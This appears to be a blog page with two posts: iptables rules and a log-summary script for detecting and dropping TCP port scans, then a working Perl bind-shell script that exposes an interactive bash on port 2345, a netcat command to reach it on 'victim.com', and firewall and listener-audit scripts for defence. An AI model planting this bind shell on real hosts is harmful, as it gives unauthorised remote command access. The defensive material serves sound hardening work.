Posts Tagged ‘Port’
Block Port Scanning With Iptables
I wrote down some rules to block commonly used port scanning techniques. The rules are below:
$IPTABLES -t mangle -A PREROUTING -p tcp --tcp-flags ALL FIN,URG,PSH -j LOG \
--log-prefix "NMAP-XMAS SCAN:" --log-tcp-options --log-ip-options
$IPTABLES -t mangle -A PREROUTING -p tcp --tcp-flags ALL NONE -j LOG \
--log-prefix "NMAP-NULL SCAN:" --log-tcp-options --log-ip-options
$IPTABLES -t mangle -A PREROUTING -p tcp --tcp-flags SYN,RST SYN,RST -j LOG \
--log-prefix "SYN/RST SCAN:" --log-tcp-options --log-ip-options
$IPTABLES -t mangle -A PREROUTING -p tcp --tcp-flags SYN,FIN SYN,FIN -j LOG \
--log-prefix "SYN/FIN SCAN:" --log-tcp-options --log-ip-options
$IPTABLES -t mangle -A PREROUTING -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP
$IPTABLES -t mangle -A PREROUTING -p tcp --tcp-flags ALL NONE -j DROP
$IPTABLES -t mangle -A PREROUTING -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
$IPTABLES -t mangle -A PREROUTING -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
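As an added example (not part of the original post), the script below summarises the kernel log lines that the four LOG rules produce, which is where the rule set earns its keep: the DROP rules alone are silent. It assumes the standard iptables LOG line format with the exact prefixes used above; the sample lines are constructed, not a real capture. Two points the rules themselves carry: the LOG rules must stay ahead of their DROP counterparts, because a packet that hits DROP is not evaluated further, and these flag combinations never occur in legitimate traffic, so the rules catch Xmas, Null, SYN/FIN and SYN/RST probes but not a plain SYN scan, which looks like an ordinary connection attempt.

```shell
#!/bin/sh
# Added example (not part of the original post): summarise the kernel log lines the
# four LOG rules above produce, as counts per scan type and source address.
# Assumed input: standard iptables LOG target lines as written by syslog/dmesg.
# The prefixes above end in ":" with no trailing space, so the kernel prints
# e.g. "NMAP-XMAS SCAN:IN=eth0"; the pattern below matches that form.

SCAN_PREFIXES='(NMAP-XMAS SCAN|NMAP-NULL SCAN|SYN/RST SCAN|SYN/FIN SCAN):'

# Constructed sample lines (RFC 5737 documentation addresses, not a real capture).
SAMPLE_LOG='Jan 10 12:00:01 host kernel: NMAP-XMAS SCAN:IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=192.0.2.10 DST=198.51.100.5 LEN=40 TOS=0x00 PREC=0x00 TTL=48 ID=0 PROTO=TCP SPT=40123 DPT=22 WINDOW=1024 RES=0x00 URG PSH FIN URGP=0
Jan 10 12:00:01 host kernel: NMAP-XMAS SCAN:IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=192.0.2.10 DST=198.51.100.5 LEN=40 TOS=0x00 PREC=0x00 TTL=48 ID=0 PROTO=TCP SPT=40123 DPT=80 WINDOW=1024 RES=0x00 URG PSH FIN URGP=0
Jan 10 12:00:02 host kernel: NMAP-NULL SCAN:IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=192.0.2.10 DST=198.51.100.5 LEN=40 TOS=0x00 PREC=0x00 TTL=48 ID=0 PROTO=TCP SPT=40124 DPT=443 WINDOW=1024 RES=0x00 URGP=0
Jan 10 12:00:02 host kernel: SYN/FIN SCAN:IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=192.0.2.77 DST=198.51.100.5 LEN=40 TOS=0x00 PREC=0x00 TTL=52 ID=0 PROTO=TCP SPT=5555 DPT=25 WINDOW=1024 RES=0x00 SYN FIN URGP=0
Jan 10 12:00:03 host kernel: NMAP-XMAS SCAN:IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=192.0.2.10 DST=198.51.100.5 LEN=40 TOS=0x00 PREC=0x00 TTL=48 ID=0 PROTO=TCP SPT=40125 DPT=8080 WINDOW=1024 RES=0x00 URG PSH FIN URGP=0
Jan 10 12:00:04 host kernel: eth0: link is up'

# Print "<count> <scan type> <source>" for each (type, source) pair seen on stdin;
# lines without one of the scan prefixes (the "link is up" line) are ignored.
scan_summary() {
  awk -v re="$SCAN_PREFIXES" '
    match($0, re) {
      kind = substr($0, RSTART, RLENGTH - 1)        # drop the trailing ":"
      src = "unknown"
      for (i = 1; i <= NF; i++) if ($i ~ /^SRC=/) src = substr($i, 5)
      count[kind " " src]++
    }
    END { for (k in count) print count[k], k }
  ' | sort -rn
}

# Print "<source> <total>" for every source with at least $1 logged probes of any type.
scan_sources_over() {
  awk -v re="$SCAN_PREFIXES" -v min="$1" '
    $0 ~ re {
      for (i = 1; i <= NF; i++) if ($i ~ /^SRC=/) total[substr($i, 5)]++
    }
    END { for (s in total) if (total[s] >= min) print s, total[s] }
  ' | sort
}

# On a live host: journalctl -k --no-pager | scan_summary
printf '%s\n' "$SAMPLE_LOG" | scan_summary
```

Giving each prefix a trailing space ("NMAP-XMAS SCAN: ") makes the lines easier to split with plain tools, and adding `-m limit --limit 5/minute` to each LOG rule keeps a sustained scan from flooding the kernel log.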
Bind bash to a port
I wrote a simple Perl script to bind bash to a port:
#!/usr/bin/perl
use Socket;

my $port  = shift || 2345;                 # port to listen on (default 2345)
my $proto = getprotobyname('tcp');
($port) = $port =~ /^(\d+)$/ or die "invalid port";

socket(S, PF_INET, SOCK_STREAM, $proto)               || die "socket: $!";
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) || die "setsockopt: $!";
bind(S, sockaddr_in($port, INADDR_ANY))               || die "bind: $!";
listen(S, 3)                                          || die "listen: $!";

my $shell = "/bin/bash -i";
while (1) {
    accept(C, S);
    if (!($pid = fork)) {
        die "Cannot fork" if (!defined $pid);
        # child: attach stdin/stdout/stderr to the connection, then run the shell
        open STDIN,  "<&C";
        open STDOUT, ">&C";
        open STDERR, ">&C";
        exec $shell || die print C "Cant execute $shell\n";
        close C;
        exit 0;
    }
}
And then you can use netcat to connect to it:
nc -vv victim.com 2345
How to protect from this attack
The simplest way is to use a firewall to block all unused ports.
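Two helpers for that advice, as an added example that is not part of the original post: one prints a default-deny iptables rule set in which only an explicit allow list of TCP ports accepts new connections, so a listener on any other port (the one on 2345 above, for instance) is unreachable from the network; the other compares the listening sockets on a host against the same allow list, so an unapproved listener is reported. The iptables path and the services in ALLOWED_TCP are placeholders to adjust per host, and the sample `ss` output is constructed.

```shell
#!/bin/sh
# Added example, not part of the original post.
# Assumptions (placeholders, adjust for the host): the iptables path and the
# services listed in ALLOWED_TCP. The sample ss output below is constructed.

IPTABLES="${IPTABLES:-/sbin/iptables}"
ALLOWED_TCP="${ALLOWED_TCP:-22 80 443}"

# Print the rules rather than applying them; review the output, then pipe it into sh
# from a console session (over SSH only if 22 is in ALLOWED_TCP, or the session drops).
default_deny_rules() {
  printf '%s -P INPUT DROP\n' "$IPTABLES"
  printf '%s -P FORWARD DROP\n' "$IPTABLES"
  printf '%s -P OUTPUT ACCEPT\n' "$IPTABLES"
  printf '%s -A INPUT -i lo -j ACCEPT\n' "$IPTABLES"
  # Replies to connections this host opened, and related traffic, stay allowed.
  printf '%s -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT\n' "$IPTABLES"
  for p in $ALLOWED_TCP; do
    printf '%s -A INPUT -p tcp --dport %s -m conntrack --ctstate NEW -j ACCEPT\n' "$IPTABLES" "$p"
  done
  # Everything else falls through to the DROP policy.
}

# $1: output of `ss -Hltn` (one listening TCP socket per line, local address in field 4)
# $2: space-separated allowed ports
# Prints "<port> <local address>" for each listener whose port is not in the allow list.
unexpected_listeners() {
  printf '%s\n' "$1" | awk -v allowed="$2" '
    BEGIN { n = split(allowed, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    NF >= 4 {
      m = split($4, f, ":"); port = f[m]      # port follows the last colon, also for [::]:22
      if (!(port in ok) && !(port in seen)) { seen[port] = 1; print port, $4 }
    }
  ' | sort -n
}

# Constructed sample: sshd, a web server, and the Perl bind shell from above
# (its listen backlog of 3 shows up as Send-Q 3).
SAMPLE_SS='LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
LISTEN 0 3 0.0.0.0:2345 0.0.0.0:*
LISTEN 0 128 [::]:22 [::]:*'

# On a live host: unexpected_listeners "$(ss -Hltn)" "$ALLOWED_TCP"
unexpected_listeners "$SAMPLE_SS" "$ALLOWED_TCP"
```

The firewall rules and the listener audit cover different failure modes: the rules stop the bound port from being reached, while the audit catches the process that bound it, which is the finding you want even when the firewall already blocks it.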